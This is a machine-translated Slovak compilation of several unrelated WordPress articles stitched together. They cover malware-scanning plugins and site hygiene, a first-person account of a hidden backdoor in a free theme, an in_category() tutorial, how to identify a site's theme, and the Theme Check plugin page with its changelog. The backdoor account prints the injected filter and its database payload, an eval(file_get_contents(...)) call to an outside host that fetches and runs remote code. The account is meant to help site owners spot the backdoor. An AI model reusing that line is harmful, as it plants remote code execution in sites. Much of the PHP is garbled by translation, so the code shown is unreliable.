Pravidelná kontrola stránky na prítomnosť škodlivých vírusov je nevyhnutná, to je prvé prikázanie každého sebavedomého webmastera. Aj keď používate čistú tému Twenty Eleven, nie je pravda, že sa časom nenakazila. Tento jav môže nastať (a najčastejšie sa vyskytuje) vďaka tomu, že samotný WordPress engine bol pôvodne navrhnutý na publikovanie online. Preto nikdy nezaškodí znova skontrolovať a urobiť kópiu stránky a databázy.

Napríklad som (samozrejme po určitom čase) pre seba urobil jeden záver - potrebujete dobrého hostiteľa a vaše problémy s rezerváciou samy zmiznú. Teraz nemusím zálohovať databázu alebo web - hostiteľ robí všetko za mňa a automaticky. Kedykoľvek, ak chcete, si môžete objednať kópiu ktorejkoľvek sekcie svojho blogu (nielen), stiahnuť si túto kópiu alebo obnoviť blog priamo z ovládacieho panela. To znamená, že nemusím sťahovať zálohu, všetko sa deje automaticky - zálohovanie, obnovenie atď. Je to pohodlné, pretože môžem sledovať nielen deň, ale aj hodinu, kedy sa na mojom blogu objavil vírus, a podľa toho prijať opatrenia na jeho odstránenie.

Začnem dobrou správou – dávajú aspoň dva pluginy, ktoré som použil pekné výsledky detekciu a lokalizáciu škodlivého kódu. Sú to doplnky AntiVirus a Exploit Scanner. Neuveríte, koľko zlého kódu je na vašom blogu! Všetky výsledné informácie po kontrole ale neberte ako dogmu – mnohé riadky, ktoré tieto pluginy detegujú, v skutočnosti v sebe nenesú nič zlé. Proste plugin spochybňuje niektoré riadky, to je všetko. Ak to chcete overiť, manuálne skontrolujte fragmenty, ktoré doplnok identifikoval ako škodlivé. Takže pri kontrole pluginu Antivírus Ukázalo sa, že aj jednoduché volanie funkcie get_cache_file () už plugin považuje za podozrivé. Takže všetky výsledky kontrol budú musieť byť sledované manuálne. Ale napríklad toto je skutočne infikovaný odkaz a je potrebné ho odstrániť:

Ako viete, či je to vírus alebo či to má byť? Všetko je veľmi jednoduché - porovnajte svoju čistú šablónu (ak existuje) a porovnajte ju (súbor po súbore) s tou, ktorá je nainštalovaná a už prešla nejakými zmenami. Nie je potrebné robiť porovnanie priamo a doslova, stačí použiť vyhľadávanie a skontrolovať, či vaša čistá šablóna obsahuje riadok, ktorý doplnok zvýraznil. Ak existuje, kliknite na tlačidlo „Toto nie je vírus“ a tento riadok sa pri ďalšej kontrole nebude brať do úvahy.

A tu je príklad druhého doplnku, ktorý som vyskúšal - Využite skener

Ako vidíte, všetko je tu oveľa zanedbanejšie. Pre mňa bol tento výsledok šokujúci. To však nie je všetko. Doplnok má takú funkciu ako kontrola . Ak ho teda zapnete, ukáže sa, že blog by mal pozostávať z textu a maximálne z pár CSS tabuliek. Zdá sa mi teda, že autor pluginu to tu evidentne prehnal s bezpečnosťou. Je dobré, že plugin iba zobrazuje údajné infikované fragmenty a nečistí ich.

Po analýze všetkých riadkov zvýraznených žltou farbou môžete ľahko odhaliť malvér (škodlivý kód), no, čo s ním ďalej urobíte, je len na vás. Spôsob čistenia je stále rovnaký - porovnajte vybraný kód so zálohou stránky (pozri) a ak zistíte nezrovnalosti, zistite, či ste to urobili sami, alebo to urobil niekto za vás, čo znamená, že to už nie je dobré a môže sa ukázať ako vírus. Dokonca aj vývojári WordPress odporúčajú skontrolovať stránku, či neobsahuje škodlivý kód pomocou tohto konkrétneho doplnku. Ale napríklad v tele iframe sú také neškodné vložky, ktoré plugin dokáže rozpoznať aj ako infikovaný kód. V skutočnosti však bez týchto riadkov nebude táto časť vášho blogu fungovať správne.

Ako sa vôbec môže malvér dostať do súborov blogu a čo to podľa definície je? Slovo malware doslova znamená - zlomyseľný softvér , z anglického škodlivého softvéru. Ide o akýkoľvek softvér, ktorý možno použiť na neoprávnený prístup na stránku a jej obsah. Pravdepodobne si predstavujete, že pre trénovaného priemerného hackera nebude ťažké hacknúť stránku, najmä po registrácii. Potom môžete obsah blogu upravovať ako chcete – bolo by to vzdelávanie.

Škodlivý malvér je možné vložiť aj do doplnkov, z ktorých inštalujete neznámy zdroj a v skriptoch, ktoré si tiež niekedy vezmete bez kontroly, no dôverujete autorovi. Najneškodnejší malvér je odkaz na autora nejakého modulu, ktorý máte nainštalovaný na stránke. A ak vás sám autor neupozornil, že takýto odkaz existuje, tak toto je už čistý vírus.

Tak som nainštaloval na testovací blog nová téma, a po odstránení jedného neškodného odkazu na akýsi pánsky klub v suteréne stránky sa vôbec prestal otvárať a na hlavnom sa objavil nápis - "Nemáte právo mazať odkazy." Tu je pre vás bezplatná téma. O tom, ako vytrhnúť takéto ľavé odkazy, si môžete prečítať.

Vaša databáza môže byť tiež použitá na spustenie škodlivého kódu. Spamové odkazy sú tiež veľmi často pridávané do príspevkov alebo komentárov. Takéto odkazy sú zvyčajne skryté, keď Pomocník CSS aby ich neskúsený správca nevidel, ale vyhľadávací systém ich okamžite rozlišuje. Do hry tu samozrejme vstupuje akýkoľvek antispam, napríklad ten, ktorý je licencovaný, kontrolovaný a mnohokrát prekontrolovaný. Hacker môže stiahnuť súbory s príponami obrázkových súborov a pridať ich do kódu vašich aktivovaných doplnkov. Preto aj keď súbor nemá príponu php, kód v tomto súbore je možné spustiť.

Existuje ešte jeden jednoduchý nástroj, pomocou ktorého som sa začal zoznamovať s malvérom – plugin Theme Authenticity Checker (TAC). Je dostatočne ľahký a výkonný, ale kontroluje iba vaše témy, dokonca aj tie, ktoré nie sú aktívne. Nedotýka sa zvyšku adresárov, a to je jeho mínus. Tu je to, čo som získal pri kontrole mojej aktuálnej témy pomocou tohto doplnku:

Dve upozornenia v aktívnej téme a nič iné. Neexistuje žiadny škodlivý kód. Mimochodom, toto sú odkazy, ktoré som sám vložil na radu Google - na zlepšenie kvality úryvku (zobrazenie osobných údajov, adresy organizácie atď.). Toto je však iba kontrola súborov tém a to, čo sa robí v iných adresároch, budete musieť zistiť buď pomocou iných doplnkov alebo online služieb. Napríklad taká služba (zaslúži si dôveru) ako Yandex Webmaster alebo podobná v Google. Majú funkciu kontroly akéhokoľvek webového zdroja na škodlivé inklúzie a robia to efektívne. Ak vám to však nestačí, porovnajte výsledky s výsledkami iných služieb a vyvodte závery.

Z nejakého dôvodu chcem veriť Yandexu, nie pluginom. Ďalším dobrým zdrojom je http://2ip.ru/site-virus-scanner/. Po skontrolovaní jedného z mojich blogov som našiel toto:

Tu môžete tiež skontrolovať, či jednotlivé súbory neobsahujú škodlivý kód, ak máte takéto pochybnosti. Vo všeobecnosti je služba dobrá.

Zo všetkého vyššie uvedeného by som vyvodil tieto závery:

1. Aby ste predišli výskytu škodlivého kódu, musíte na sťahovanie súborov v prvom rade využívať dôveryhodné služby – pluginy, témy atď.

2. Pravidelne si robte záložné kópie všetkého, čo stránka obsahuje – databázy, obsah, admin panel vrátane nahraných súborov tretích strán.

3. Užite si aktualizácie, ktoré ponúka WordPress. Sú aspoň bez vírusov, aj keď nie vždy funkčne opodstatnené. Aktualizáciou však odstránite vírusy, ktoré môžu byť prítomné.

4. Nepoužívané motívy, pluginy, obrázky a súbory, odstráňte bez ľútosti – to je ďalší záložný nástroj pre malvér, ktorý možno nikdy neuhádnete.

5. Uistite sa, že ste heslom chránili svoj FTP prístup, prihlásenie do PhpAdmin, panel administrátora a všeobecne tam, kde by nemal mať prístup nikto okrem vás.

6. Skúste (aj keď je táto túžba veľká ako nebo) nemeňte ani nenahrádzajte základné súbory WordPress – vývojári vedia lepšie, čo by malo fungovať a ako.

7. Po zistení a odstránení vírusov zmeňte všetky heslá. Myslím, že budete mať veľkú túžbu vytvoriť heslo 148 znakov v rôznych registroch a so špeciálnymi znakmi. Nenechajte sa však príliš uniesť zložité heslá, môžete ho stratiť a potom musíte všetko obnoviť, čo nie je veľmi príjemné.

Všetky tieto metódy a komponenty, ktoré som opísal a ktoré vám pomôžu zbaviť sa vírusov, sú samozrejme zadarmo, samozrejme, takmer domáce, a samozrejme nedávajú 100% záruku, že vaše stránky budú vyčistené od škodlivých vložiek . Preto, ak sa už obávate o čistenie blogu, je lepšie kontaktovať profesionálov, napríklad v službe Sucuri(http://sucuri.net/). Tu bude vaša stránka starostlivo monitorovaná, praktické odporúčania vám budú zaslané listom a ak nechcete stránku čistiť sami, potom sú vám k dispozícii špecialisti, ktorí do 4 hodín urobia všetko najlepším možným spôsobom:

No a takto vyzerá môj testovací blog po sledovaní, a to aj napriek tomu, že iné metódy (homebrew) vždy vykazujú iné výsledky. Ako vidíte, test je bezplatný, ale ak sa nájdu vírusy, mali by ste zaplatiť za ich odstránenie bez poškodenia stránky (pokiaľ, samozrejme, nie ste guru na čistenie blogov od škodlivého softvéru).

Dovoľte mi ešte raz zdôrazniť, že hackeri sú v strehu, vírusy sa neustále aktualizujú a nie je možné sledovať všetko sami. Všetky inovácie sú tak starostlivo skryté a zamaskované, že ich môže odhaliť iba tím! profesionáli, nie bloger samouk, ktorým mnohí sú. To je dôvod, prečo je ručná detekcia a odstránenie škodlivého softvéru také neúčinné: žiadna skúsenosť - žiadny výsledok, ale existuje vírus. Použite licencované programy a zverte odstraňovanie nebezpečenstva odborníkom

Dobrý deň, priatelia. Ste si istý, že bezplatná šablóna WordPress, ktorú používate pre svoje weby a blogy, je skutočne bezpečná a neobsahuje skryté hrozby a škodlivý kód? Si si tým úplne istý? Absolútne?)

Myslíte si, že prešli šablónu, odstránili z nej skryté odkazy a je hotovo. Pravidelne skenujete súbory stránok antivírusom, pozeráte sa do nástrojov správcu webu Yandex na karte Zabezpečenie a s úľavou tam vidíte správu: “ Na stránke sa nenašiel žiadny škodlivý kód«.

To som si myslel aj ja. Nechcem ťa naštvať, ale...

Skrytý nebezpečný kód v bezplatných témach WordPress

Toto je list, ktorý som minulý týždeň dostal poštou z môjho hostingu. Nedávno zaviedli pravidelnú kontrolu všetkých súborov stránky na škodlivý obsah a napriek tomu u mňa našli tento obsah!

Všetko to začalo tým, že som jedného dňa išiel na svoju stránku a nemohol som ju spustiť - objavil sa urážlivý nápis o nenájdených súboroch s príponou php. Po miernom napätí som si išiel preštudovať obsah priečinka so stránkou na hostingu a okamžite som zistil problém - môj súbor šablóny fuctions.php bol premenovaný na functions.php.malware, čo, ako to bolo, nejednoznačne naznačovalo - tu fungoval antivírus alebo niečo podobné) Po zadaní pošty som našiel vyššie uvedenú správu od hostiteľa.

Najprv som, samozrejme, začal kontrolovať tento súbor, študoval jeho obsah, skenoval som ho všetkými druhmi antivírusov, desiatkami online antivírusových služieb atď. - nakoniec som nič nenašiel, všetci jednomyseľne tvrdili, že súbor je úplne bezpečný. Samozrejme som hostiteľovi vyjadril svoje pochybnosti s tým, že ste niečo pokazili, ale pre každý prípad som ich požiadal o poskytnutie správy o objavení škodlivého kódu.

A toto mi povedali

Išiel som na google informácie o tomto kóde a vážne som o tom premýšľal ...

Ako nájsť kúsok škodlivého kódu v šablóne

Ako sa ukázalo, ide o skutočne netriviálny trik, ktorý umožňuje záujemcom prenášať údaje na vašu stránku a meniť obsah stránok bez vášho vedomia! Ak používate bezplatnú šablónu, potom Dôrazne odporúčam, aby ste si skontrolovali nasledujúci kód v súbore functions.php:

add_filter('the_content', '_bloginfo', 10001);
funkcia _bloginfo($content)(
globálny $post;
if(is_single() && ( [e-mail chránený](get_option('blogoption'))) !== false)(
vrátiť $co;
) else return $content;
}

Aj pri mojej veľmi plytkej znalosti php je vidieť, že sa vytvára určitý filter, ktorý je naviazaný na globálnu premennú príspevok a obsah, ktoré majú na starosti zobrazovanie obsahu len na stránkach blogových príspevkov (podmienka is_single). Už je to podozrivé, nie? No, teraz sa pozrime, čo to ukáže daný kód na našej webovej stránke.

Zaujímavá možnosť blogu požadovaná v databáze tiež vyzerá veľmi podozrivo. Ideme do našej databázy MySQL a nájdeme tam tabuľku s názvom wp_options, ak ste nezmenili predpony, bude to predvolene vyzerať takto. A v ňom nájdeme pre nás zaujímavú líniu s názvom blogoption

Aká nádhera! Vidíme nasledujúcu možnosť

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Tie. nám z určitej stránky (navyše ruskej, uvedomte si) vraciame obsah, ktorý môže niesť čokoľvek! Ľubovoľný počet odkazov, škodlivých kódov, pozmeneného textu atď. Samotná stránka pri prístupe k nej vydáva chybu prístupu 403, čo nie je prekvapujúce. Samozrejme som aj túto možnosť z databázy odstránil.

Podľa informácií od obetí sa presne obsah vášho článku zvyčajne vráti iba s jednou úpravou - namiesto akejkoľvek bodky "." v texte bol zamaskovaný otvorený odkaz! A mimochodom, táto možnosť sa zapíše do databázy pri inštalácii samotnej šablóny a potom sa kód, ktorý to robí, bezpečne sám zničí. A s takým svinstvom som žil dva roky a za celý ten čas mi túto hrozbu neodhalil ani jeden antivírus alebo služba. Aby som bol úprimný, nevšimol som si, či táto technika pre mňa niekedy fungovala, alebo či môj bezpečnostný doplnok túto možnosť zablokoval (alebo možno jedna z aktualizácií WordPressa túto dieru uzavrela), ale stále je to nepríjemné.

Morálka voľného syra

Ako sa vám páči prepracovanosť našich „prekladateľov“ šablón (resp. tých, ktorí ich umiestňujú do svojich katalógov)? Nie je na vás, aby ste vystrihovali odkazy z päty) Škoda, že si nepamätám, odkiaľ som stiahol svoju šablónu, bolo to dávno, inak by som napísal pár láskavých. A ak by som v tom čase mal rovnakú skúsenosť ako teraz, tak by som určite nepoužil bezplatnú šablónu, alebo v extrémnych prípadoch nesťahoval z neznámych zdrojov!

Jednoduchšie je kúpiť si nejakú oficiálnu prémiovú šablónu za 15-20 dolárov na tej istej a žiť v pokoji s vedomím, že v nej nie sú žiadne diery a zašifrované odkazy a aj keď sú tam slabiny, vývojári určite vydajú aktualizáciu, v ktorej tieto otvory budú uzavreté. ( Mimochodom, Artem nedávno publikoval článok, kde len hovorí o prémiových šablónach a dokonca rozdáva propagačné kódy na brutálne zľavy pre tých, ktorí majú záujem)

Predstavte si, že zobrazujete záznamy a potrebujete zmeniť vzhľad v závislosti od rubriky. Napríklad máte blok „O AUTOROVI“, ktorý zobrazuje informácie o autorovi článku, ale nechcete tento blok vidieť napríklad pod príspevkami z kategórie, v ktorej to nie je potrebné. Môžete tiež zakázať komentovanie v určitých kategóriách, miniatúrach atď. Všetko závisí od vašich potrieb a fantázie. Osobne túto podmienku využívam veľmi často.

Na filtrovanie záznamov v závislosti od kategórie vám pomôže funkcia - in_category(). Táto funkcia kontroluje, či aktuálny alebo daný záznam patrí do želanej kategórie, studne alebo do niekoľkých kategórií. Najčastejšie sa táto funkcia zobrazuje v súbore single.php, pretože je zodpovedný za zobrazovanie záznamov.

Najjednoduchší spôsob použitia funkcie by vyzeral asi takto. Tento kód pridáme do súboru single.php, v prípade potreby priložíme značky v PHP.

PHP tagy vyzerajú takto:

Ak váš motív používa prevažne HTML kód, prilepte nižšie uvedený kód bez zmien. Ak sa používa hlavne PHP, potom značky, v ktorých je kód uzavretý, môžu byť odstránené.

V tomto kóde sme nastavili podmienku, že ak aktuálny príspevok patrí do kategórie s ID - 12, tak treba niečo zobraziť. Čokoľvek chcete, pridajte dovnútra kučeravých zátvoriek. Mal by to byť kód PHP, ak je to ťažké a potrebujete pridať kód HTML, potom kód rozbite pomocou rovnakých značiek PHP a kód bude takýto:

//tu napíšeme bežný HTML kód alebo len text.

Ak chcete určiť ID kategórií, musíte prejsť na zoznam kategórií na paneli správcu a umiestniť kurzor myši na požadovanú kategóriu. V spodnej časti okna prehliadača na pravej strane sa vo vnútri objaví odkaz, ktorý bude mať podobu ID=1, to znamená, že ID tejto kategórie je 1.

Ak potrebujete zadať niekoľko kategórií, uveďte ich oddelené čiarkami. Možno budete musieť vytvoriť podmienku „AK - POTOM“, potom bude kód vyzerať takto:

Predstavte si, že potrebujete zobraziť miniatúru príspevku v rubrike 12 a prvý obrázok z textu v ďalších príspevkoch z iných rubrik. Stáva sa to a ako to urobiť? S vyššie uvedeným kódom. O výstupe prvého obrázku zo záznamu si môžete prečítať v článku -

Teraz chcem ukázať ešte jednu vlastnosť, ktorú možno k tejto funkcii pridať. Stáva sa, že rubriky majú podkategórie, teda podradené kategórie. A ak záznam patrí do niektorej z podkategórií, tak ho podmienka obíde. Ak je to to, čo potrebujete, nemôžete sa ničoho dotknúť, ale ak by napriek tomu mala podmienka fungovať pre podnadpisy, musíte k podmienke pridať doplnok. Na začiatok musíte k samotnej podmienke pridať nasledujúcu časť - || post_is_in_descendant_category(12). Toto je volanie našej novej funkcie, ktorá skontroluje podkategórie. Hotový kód bude vyzerať takto:

Aby nová funkcia začala fungovať, musíte pridať samotný kód tejto funkcie, to znamená, že ju musíte napísať. Ak to chcete urobiť, nájdite súbor v priečinku s aktívnou témou funkcie.php, ktorý obsahuje užívateľom definované funkcie. Ak nie ste oboznámení s PHP, musíte pridať kód na úplný koniec súboru, ale ak je tam uzavretie PHP značka - ?> , potom pred ním musíte pridať. Samotný kód vyzerá takto:

Funkcia post_is_in_descendant_category($cats, $_post = null) ( foreach ((pole) $cats ako $cat) ( // get_term_children() akceptuje iba celé číslo ID $descendants = get_term_children((int) $cat, "category"); ak ($descendants && in_category($descendants, $_post)) return true; ) return false; )

Ak je všetko vykonané správne, vaša podmienka vyberie príspevky pre určité kategórie a ich podkategórie.

Tento článok som začal písať už dávno, ale všetky ruky nedosiahli, aby ho dokončili, potom ho prerušila jedna, potom druhá. Nakoniec sa článok skončil a možno mnohí pomôžu vyriešiť problém.

To je všetko, ďakujem za pozornosť. 🙂

Zamysleli ste sa niekedy nad tým, akú tému používa konkrétna stránka?

Pri hľadaní dokonalej témy sa často pozeráme na iné dokončené projekty, aby sme našli niečo podobné alebo aby sme vytvorili našu stránku na rovnakú tému, len s vlastným individuálnym dizajnom.

V tomto návode vám ukážeme nástroje a triky, ktoré môžete použiť, aby ste zistili, akú tému tento web WordPress používa.

Metóda 1: Verifikačná stránka IsItWP

Najjednoduchším spôsobom je prejsť na stránku isitwp.com a pozrieť si stránku, o ktorú máte záujem.

Toto je online nástroj, ktorý vám ukáže, akú tému WordPress používa a či sa WordPress na stránke vôbec používa.

Ak na stránke beží WordPress, IsItWP sa pokúsi zistiť názov aktuálnej témy.

Pokúsi sa tiež zistiť, aké aktívne doplnky sa na stránke používajú:

Ak máte šťastie a nejde o vlastnú alebo detskú tému, IsItWP vám dá názov témy a môžete túto tému hľadať ďalej.

Metóda 2. Definujte ručne

Vlastníci alebo vývojári stránok niekedy zmenia názov natívneho WordPress témy. V tomto prípade vám nástroje ako IsItWP nebudú môcť pomôcť.

Ale aj tak môžu byť v kóde stránky rôzne rady, ktoré vám pomôžu zistiť, aký druh motívu je nainštalovaný.

Pozrime sa.

Každá téma WordPress musí mať a style.css. Tento súbor obsahuje hlavičku vo vnútri, ktorá spravidla označuje názov témy, autora témy, verziu a stránku vývojára témy. Špecifikuje aj ďalšie šablóny css, ktoré téma používa.

Ak chcete nájsť tento súbor, musíte najskôr prejsť na samotnú stránku. Kliknite pravým tlačidlom myši niekde na hlavnej stránke a prejdite na zobrazenie zdrojového kódu ( Zobraziť zdroj stránky).

Zdrojový kód hlavnej stránky webu sa otvorí v prehliadači na novej karte.

Teraz musíte nájsť riadok kódu, ktorý vyzerá asi takto:

Ak chcete veci zjednodušiť, môžete na tejto karte vyhľadávať pomocou kódu úryvku „ témy Toto je časť adresára, kde sa nachádza style.css.

Takto nájdete cestu, kde sa nachádza súbor style.css a tento súbor môžete otvoriť priamo v prehliadači na novej karte.

V hornej časti style.css bude hlavička s nadpisom (o ktorom sme hovorili vyššie). Toto sú servisné informácie o téme. Vyzerá to asi takto:

/* Názov témy: Názov témy URI témy: https://example.com Autor: ThemeAuthorName Autor URI: https://example.com Popis: My Theme je flexibilná téma WordPress navrhnutá pre portfóliové weby Verzia: 1.1.47 Licencia: GNU General Public License v2 alebo novšia URI licencie: http://www.gnu.org/licenses/gpl-2.0.html Textová doména: hestia Tagy: blog, vlastné-logo, portfólio, e-commerce, rtl-language-support , post-formáty, rozloženie mriežky, jeden stĺpec, dva stĺpce, vlastné pozadie, vlastné farby, vlastná hlavička, vlastná ponuka, hlavička hlavného obrázka, odporúčané obrázky, flexibilná hlavička, plná šírka -template, sticky-post, theme-options, threaded-comments, preklad-ready */

Z tohto bloku môžete zistiť názov témy a adresu vývojára. Potom zostáva len nájsť túto tému na internete.

Metóda 3. Ako nájsť nadradenú tému

Mnoho stránok používa detské motívy na prispôsobenie vzhľadu. A toto je celkom správny prístup.

V tomto prípade, ak ste našli súbor style.css z podradenej témy, jej hlavička bude obsahovať informácie o nadradenej téme:

/* Názov témy: Téma Moje dieťa Popis: Len detská téma Autor: Peter Smith URL autora: Sem napíšte adresu URL blogu alebo webovej stránky autora Šablóna: hestia Verzia: 1.0 Licencia: GNU General Public License v2 alebo novšia URI licencie: http :/ /www.gnu.org/licenses/gpl-2.0.html Textová doména: my-child-theme */

Vo vyššie uvedenom príklade je parameter " Šablóna“, čo znamená, že pre túto podradenú tému sa používa nadradená téma „Hestia“.

O rodičovskej téme sa dozviete aj zo zdrojového kódu opísaného v metóde 2. V kóde nájdete odkaz na súbor style.css nielen z podradenej témy, ale aj z nadradenej témy.

Nezabudnite však, že vývojár sa mohol pokúsiť zmeniť všetky hlavičky pre style.css na svoje vlastné, v takom prípade by bolo veľmi ťažké určiť pôvodnú tému.

Doplnok kontroly tém predstavuje jednoduchý spôsob, ako otestovať svoju tému a uistiť sa, že je v súlade s najnovšími štandardmi kontroly tém. s tým, môžeš spustiť všetky rovnaké automatické testovacie nástroje na vašej téme, ktoré WordPress.org používa na odosielanie tém.

Testy sa spúšťajú cez jednoduché admin menu a všetky výsledky sa zobrazujú naraz. To je veľmi užitočné pre vývojárov tém alebo kohokoľvek, kto sa chce uistiť, že ich téma podporuje najnovšie štandardy a postupy pre témy WordPress.

Ako povoliť formátovanie Trac

Tím kontroly tém používa tento doplnok pri kontrole tém a kopírovaní/vkladaní výstupov do lístkov sledovania, systém sledovania má svoj vlastný značkovací jazyk.
Ak chcete povoliť formátovanie Trac v Theme-Check, musíte definovať niekoľko premenných v súbore wp-config.php:
TC_PRE a TC_POST sa používajú ako hlavička a päta lístka.
Príklady:
define('TC_PRE', 'Recenzia témy:[]
- Témy by sa mali kontrolovať pomocou "define(\'WP_DEBUG\', true);" wp-config.php[]
— Témy by sa mali preskúmať pomocou testovacích údajov z kontrolných zoznamov tém (TC)
——
‘);

Define("TC_POST", "Neváhajte použiť kontaktné údaje uvedené nižšie, ak máte nejaké otázky, komentáre alebo spätnú väzbu:[] [] * Zanechajte komentár k tomuto tiketu[] * Pošlite e-mail na e-mail s recenziou témy zoznam[] * Použite #wordpress-themes IRC kanál na Freenode.");

Ak buď z týchto dvoch premenných sú definované, vedľa položky sa zobrazí začiarkavacie políčko Skontrolujte to! tlačidlo.

Často kladené otázky

Číslo verzie je dátum revízie pokynov použitých na jej vytvorenie.

Prečo označuje niečo ako zlé?

Nie je to označovanie „zlých“ vecí ako také. Kontrola témy je navrhnutá ako nedokonalý spôsob testovania súladu s pokynmi na preskúmanie témy. Nie všetky témy musia spĺňať tieto pokyny. Účelom nástroja na kontrolu je zabezpečiť, aby témy nahrané do centrálneho úložiska tém WordPress.org spĺňali najnovšie štandardy tém WordPress a fungovali na širokej škále stránok.

Mnoho stránok používa prispôsobené témy a to je úplne v poriadku. Témy, ktoré sú určené na použitie na mnohých rôznych druhoch stránok verejnosťou, však musia mať určitú minimálnu úroveň schopností, aby sa zabezpečilo správne fungovanie v mnohých rôznych prostrediach. Pokyny na preskúmanie tém sú vytvorené s ohľadom na tento cieľ.

Táto kontrola tém nie je dokonalá a nikdy nebude. Je to len nástroj na pomoc autorom tém alebo komukoľvek inému, kto chce svoju tému urobiť schopnejšou. Všetky témy odoslané na WordPress.org sú ručne kontrolované tímom odborníkov. Automatizovaná kontrola tém má byť len užitočným nástrojom, nie absolútnym systémom merania.

Tento plugin nie rozhodnúť o použitých usmerneniach. Akékoľvek problémy s konkrétnymi pokynmi na kontrolu tém by ste mali prediskutovať na stránke Make Themes.

Recenzie

Toto je skvelý doplnok pre každého, kto skutočne rád vyvíja tému WordPress a úspešne testuje základné štandardy WordPress. Chyby sú oddelené v "Povinné", "Varovanie", "Odporúčané" a "Informácie". Poskytnite tiež základné informácie o tejto chybe a pochopíte, kde je problém.

Členovia a vývojári

Theme Checker je projekt s otvoreným zdrojovým kódom. K vývoju doplnku prispeli nasledujúci prispievatelia:

Denník zmien

20190801.1

• Opravte chýbajúcu kontrolu nonce a kontrolu nonce na stránke správcu. podporuje Stevena Sterna za nahlásenie problému tímu doplnkov. Hoci ide technicky o CSRF, nevyplýva z toho žiadna zraniteľnosť, pretože jediná vec, ktorú možno s formulárom urobiť, je naskenovať tému.

20190208.1

• Pridajte nové štýly pre editor blokov. Pozrite si https://meta.trac.wordpress.org/ticket/3921

20160523.1

• Oprava názvov tém s pomlčkami
• Komentáre odstraňujú zmeny
• Mnoho zmien vykonaných tímom pre kontrolu tém a ďalšími. Úplný zoznam zmien nájdete na Github.

20151211.1

• Úplná synchronizácia s Githubom a všetkými zmenami, ktoré sa tam udiali.
• Vydanie pre zastarané funkcie 4.4.

20140929.1

• Pridané nové kontroly a aktualizácie od Franka Kleina v Automattic. Vďaka Frank!
• Aktualizované zoznamy zastaraných funkcií
• Kontrola prispôsobenia: Všetky nastavenia add_settings musia z bezpečnostných dôvodov používať spätné volanie dezinfekcie
• Kontroly územia doplnkov: Témy nesmú registrovať typy príspevkov alebo taxonómie ani pridávať krátke kódy pre obsah príspevku
• Widgety: Volania na register_sidebar sa musia volať z akčného háku widgets_init
• Title: tagy musia existovať a nie majú v sebe niečo iné ako volanie wp_title()
• CDN: Kontroluje použitie bežných CDN (len odporúčané)
• Poznámka: Zmenené identifikátory URI doplnku a autora, pretože staré identifikátory URI sú neplatné. Tieto sa môžu v budúcnosti opäť zmeniť, URI mojej vlastnej stránky sú len dočasne.

20131213.1

• Opravené chyby nezobrazuje doplnok a nesprávne dáva výsledok „prejde“ všetkému.

20131212.1

• Aktualizované na 3.8
• Väčšina súborov sa zmenila kvôli lepšej podpore I18N, takže jazykové súbory boli dočasne odstránené, kým nebude možné preklad zopakovať.

20121211.1

• Aktualizované na 3.5
• Tlačidlo Odstrániť PayPal.

20110805.1

• Kontroly TimThumb boli odstránené.
• Vo výsledkoch je teraz zobrazená ukážka snímky s veľkosťou súboru a rozmermi.

20110602.2

• Nové funkcie zoznamu súborov, skryté priečinky sa teraz dajú zistiť.
• Lepšie fopen kontroly.
• Tim Thumb verzia bump

20110602.1

• Kontrola štýlu ukončenia riadkov v systéme DOS/UNIX je teraz požiadavkou na správne nahranie témy.
• Timthumb verzia bump
• GaryJ nahlásil niekoľko opráv
• 3.2 boli pridané zastarané funkcie

20110412.1

• Opravte regulárne výrazy
• Pridaná kontrola najnovšieho hacku vstrekovania päty.
• Opravte kontrolu značiek, aby ste správne používali novú funkciu obsahu
• Synchronizácia všetkých zmien vykonaných pre kontrolu témy wporg uploader.
• Aktualizované šeky po 3.1. pridaná kontrola snímky obrazovky do svn.
• Opravte kontrolu odkazov, aby sa v niektorých prípadoch nevrátilo falošné zlyhanie
• rm jedna z kontrol, ktorá spôsobuje problémy na wporg uploader (a ktorá je tiež zbytočná)
• Presuňte nepotrebné funkcie z checkbase do main.php.
• Len menšie zmeny formátovania (medzery a podobne)
• Pridať kontrolu pre wp_link_pages() + opraviť eval() kontrolu

20110219.2

• Zlúčené nové podporné prvky používateľského rozhrania Gua Bob
• Posledná testovaná téma je vždy vopred vybratá v zozname tém.
• Opravená chyba php v admin_menu.php

20110219.1

• Zmeny nájdete v protokole odovzdania.

20110201.2

• Opravy chýb používateľského rozhrania Mamaduka.
• Textová doména kontroluje dvadsať a žiadnu doménu.
• Opravte div nezatvárajúce rekvizity Mamaduka.

20110201.1

• i18n funguje
• sr_RS de_DE ro_RO langs rekvizity Daniel Tara a Emil Uzelac.
• Pridaná podpora podradenej témy, kontroly vykonané proti rodičovi A podriadenému počas behu.
• Pre recenzentov bolo pridané tlačidlo formátovania sledovania.

20101228.3

• Posledná revízia pre 3.1 (dúfajme)
• Čipy návrh na kontrolu zahrnutia searchform.php (nie
  perfektné, treba hľadať viac príkladov).
• add_theme_page je povinný, všetky ostatné označené a zobrazené s čiarou
  čísla.
• Väčšinou internacionalizované, teraz potrebuje preklady.
• Opravy chýb.

20101228.2

• Pridaná kontrola menu.
• ThemeURI AutohourURI pridané do výsledkov.
• Veľa malých opráv.
• Začatý preklad.

20101228.1

• Opravte kontrolu filtra embed_defaults a kontrolu údajov súboru šablóny so štýlmi.

20101226.1

• Prepracovanie celého systému, aby sa umožnila jednoduchšia synchronizácia s nahrávačom WordPress.org. Mnohé ďalšie pridania/odčítania/zmeny.
• Pridané pokyny pre WordPress 3.1, ktoré pomôžu autorom tém zabezpečiť kompatibilitu pre nadchádzajúce vydanie.

20101110.7

• Znovu pridané malware.php kontroluje fopen a file_get_contents (INFO)
• opravených niekoľko nedefinovaných chýb indexu.

20101110.4_r2

• Opravené upozornenie: Nesprávny počet parametrov pre stristr()

20101110.4_r1

• Pridané echo na navrhla.php

20101110.4

• Opravené zastarané volanie funkcie get_plugins()

20101110.3

• Opravený nedefinovaný index.

20101110.2

• Chýba< in main.php
• Pridané podmienené kontroly pre license.txt ALEBO licenčné značky v style.css
• Vylepšenia používateľského rozhrania.